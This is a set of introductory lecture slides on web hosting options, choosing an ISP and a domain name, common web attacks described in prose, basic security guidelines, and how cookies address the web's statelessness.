Web Hosting & Security

Major Topics

1. Hosting your website on your own server

2. Using ISP to Host your website
3. Domain Names
4. Web Security
5. Statelessness of the web & Cookies
1. Hosting your website on your own server

• Hosting your website on your own server is always a possible option. To

have a really functioning website, try to consider the following:
• Hardware Expenses: you will have to buy some powerful server
hardware. Don't expect that a low cost PC will do the job.
• High-speed connection: you will also need a permanent (24 hours a
day/7 days a week/365 days a year) high-speed connection.
• Software Expenses: consider the number of user that can connect to
your server because some server-licenses might have limits on number of
users.
• Labour Expenses: give appropriate consideration to labour expenses.
You have to install your own hardware and software. You also have to
deal with bugs and viruses, and keep your server constantly running
in an environment where "everything could happen".
2. Using ISP to Host your website

• Renting a server from an Internet Service Provider (ISP) is a common

option. Most small companies store their web site on a server provided by an
ISP. Here are some advantages of this option:
• Connection Speed: Most ISPs have very fast connections to the Internet.
• Powerful Hardware: ISPs often have powerful web servers that can be shared
by several companies. You can also expect them to have an effective load
balancing, and necessary backup servers.
• Security and Stability: ISPs are specialists on web hosting. Expect their servers
to have more than 99% up time, the latest software patches, and the best virus
protection.
Things to Consider while choosing an ISP
• 24-hour support
• Make sure your ISP offers 24-hours support. Don't put yourself in a
situation where you cannot fix critical problems without having to
wait until the next working day. Toll-free phone could be vital if you
don't want to pay for long distance calls.
• Daily Backup
• Make sure your ISP runs a daily backup routine; otherwise you may lose
some valuable data.
• Traffic Volume
• Study the ISP's traffic volume restrictions. Make sure that you don't have
to pay a fortune for unexpected high traffic if your web site becomes
popular.
Things to Consider while choosing an ISP(Continued...)

• Bandwidth or Content Restrictions

• Study the ISP's bandwidth and content restrictions. If you plan to publish
pictures or broadcast video or audio, make sure that you can.
• E-mail Capabilities
• Make sure your ISP supports the e-mail capabilities you need.
• Front Page Extensions
• If you use FrontPage to develop your web site, make sure your ISP
supports FrontPage server extensions.
• Database Access
• If you plan to use data from databases on your web site, make sure your
ISP supports the database access you need.
3. Domain Names
• A domain name is a unique name for a web site, like mitethiopia.edu.et.
Domain names must be registered through domain name registration
companies. These companies provide interfaces to search for available
domain names, and they offer a variety of domain name extensions that can
be registered at the same time.
• When domain names are registered, they are added to a large domain
name register. In addition, information about the web site, including the IP
address, is stored on a DNS server.
• DNS stands for Domain Name System. A DNS server is responsible for
informing all other computers on the Internet about the domain name and the
web site address.
3. Domain Names(Continued…)
Choosing a Domain Name
• Choosing a domain name is a major step for any individual or organization. New
domain name extensions and creative thinking still offer thousands of excellent
domain names!
• When choosing a name, it is important to consider the purpose of a domain name,
which is to provide an easy way to reach your web site.
• The best domains have the following characteristics:
• Short - people don't like to type! A short domain name is easier to type, read, and remember.
• Meaningful - a short domain is nothing without meaning, a domain name like 34i4nh.com is not easy to
enter or to remember. Select a domain that relates to your site in a way that people will understand.
• Clear - clarity is important when selecting a domain name. Avoid a name that is difficult to spell or
pronounce.
• Exposure - names that are short and easy to remember are an asset. In addition to visitors, also consider
search engines.
4. Web Security
• A computer is secure if you can depend on it and its software to behave as
you expect.
• While much of the effort in computer security is focused on countering the
threat from malicious humans, a truly secure computer must also contend
with the threats posed by legitimate, though careless, humans as well as acts
of nature.
• The web poses some additional security troubles because:
• so very many different computers are involved in any networked
environment;
• The physical infrastructure of the Internet is not owned or controlled by
any one organization and any one can launch an attack on your website.
• No guarantees can be made concerning the integrity and security of any
part of the Internet.
4. Web Security(Continued…)

• The following are the most common security attacks in the web:
• Script injection attacks : involve adding some client-side browser script
code ( For example, JavaScript code) into one of the application's forms that,
once displayed on the site, results in that code being run (on the end user's
browser). This code can do anything that client-side script code can do, but is
often used to redirect the user to another site for some malevolent purpose.
Such script code can also forward the user's session key to another site, so
that the recipient of this key can impersonate the legitimate owner of this
key.
• GET/POST parameter hacking: this attack consists of rewriting GET
request query strings or POST request HTTP headers to trick the web
application into performing differently. Examples include: setting the price
of an item to a very low or zero dollar value, asking the web application to
display the contents of a file containing sensitive information, uploading
harmful programs to the server, or merely breaking or disabling the web
application.
4. Web Security(Continued…)

• Web Security Guidelines:

• Avoid physical entrance into your web server hardware. Physical accesses to
computer hardware gives even a slightly-skilled person total control of that
hardware. Without physical security to protect hardware (i.e. doors that lock)
nothing else about a computer system can be called secure.
• Enforce authentication and authorization in your web server.
• Run “services” in your system with user accounts of minimum privileges, and
restrict the service to a closed-off region in the file system.
• Must have proper backups.
• Trust nothing about the data sent from the client
• Disable any special functionality of the server-side scripting platform that is not
needed and that could be used in an attack
• Run HTTPS if your website has content of any type that has sensitive
information. And shutdown all non-essential listening ports in your system.
5. Statelessness of the web & Cookies
• The Web is basically stateless. There is no concept of a login session. The browser
sends a request to a server and gets back a file. Then the server forgets that it has ever
seen that particular client.
• At first, when the Web was just used for retrieving publicly available documents, this
model was perfectly adequate. But as the Web started to acquire other functions, it
caused problems.
• For example, some Web sites require clients to register (and possibly pay money) to
use them. This raises the question of how servers can distinguish between requests
from registered users and everyone else.
• A second example is from e-commerce. If a user wanders around an electronic store,
tossing items into her shopping cart from time to time, how does the server keep track
of the contents of the cart?
• A third example is customized Web portals such as Yahoo. Users can set up a
detailed initial page with only the information they want (e.g., their stocks and their
favourite sports teams), but how can the server display the correct page if it does not
know who the user is?
5. Statelessness of the web & Cookies(Continued…)

• At first glance, one might think that servers could track users by observing their IP
addresses.
• However, this idea does not work. First of all, many users work on shared
computers, especially at companies, and the IP address merely identifies the
computer, not the user. Second, and even worse, many ISPs use NAT, so all
outgoing packets from all users bear the same IP address. From the server's point of
view, all the ISP's thousands of customers use the same IP address.
• To solve this problem, Netscape devised a much-criticized technique called cookies.
The name derives from ancient programmer slang in which a program calls a
procedure and gets something back that it may need to present later to get some work
done.
• When a client requests a web page, the server can supply additional information along
with the requested page. This information may include a cookie, which is a small (at
most 4 KB) file (or string). Browsers store offered cookies in a cookie directory on
the client's hard disk unless the user has disabled cookies.
5. Statelessness of the web & Cookies(Continued…)

• The structure of Cookies

5. Statelessness of the web & Cookies(Continued…)

• Cookies are just files or strings, not executable programs. In principle, a cookie could contain a
virus, but since cookies are treated as data, there is no official way for the virus to actually run
and do damage. However, it is always possible for some hacker to exploit a browser bug to
cause activation.
• Cookie may contain up to five fields, as shown in the previous slide. The Domain tells where
the cookie came from. Browsers are supposed to check that servers are not lying about their
domain. Each domain may store no more than 20 cookies per client. The Path is a path in the
server's directory structure that identifies which parts of the server's file tree may use the cookie.
It is often /, which means the whole tree.
• The Content field takes the form name = value. Both name and value can be anything the server
wants. This field is where the cookie's content is stored.
• The Expires field specifies when the cookie expires. If this field is absent, the browser discards
the cookie when it exits. Such a cookie is called a non - persistent cookie. If a time and date are
supplied, the cookie is said to be persistent and is kept until it expires.
• The Secure field can be set to indicate that the browser may only return the cookie to a secure
server. This feature is used for e-commerce, banking, and other secure applications.
End of slides

• If you have any question?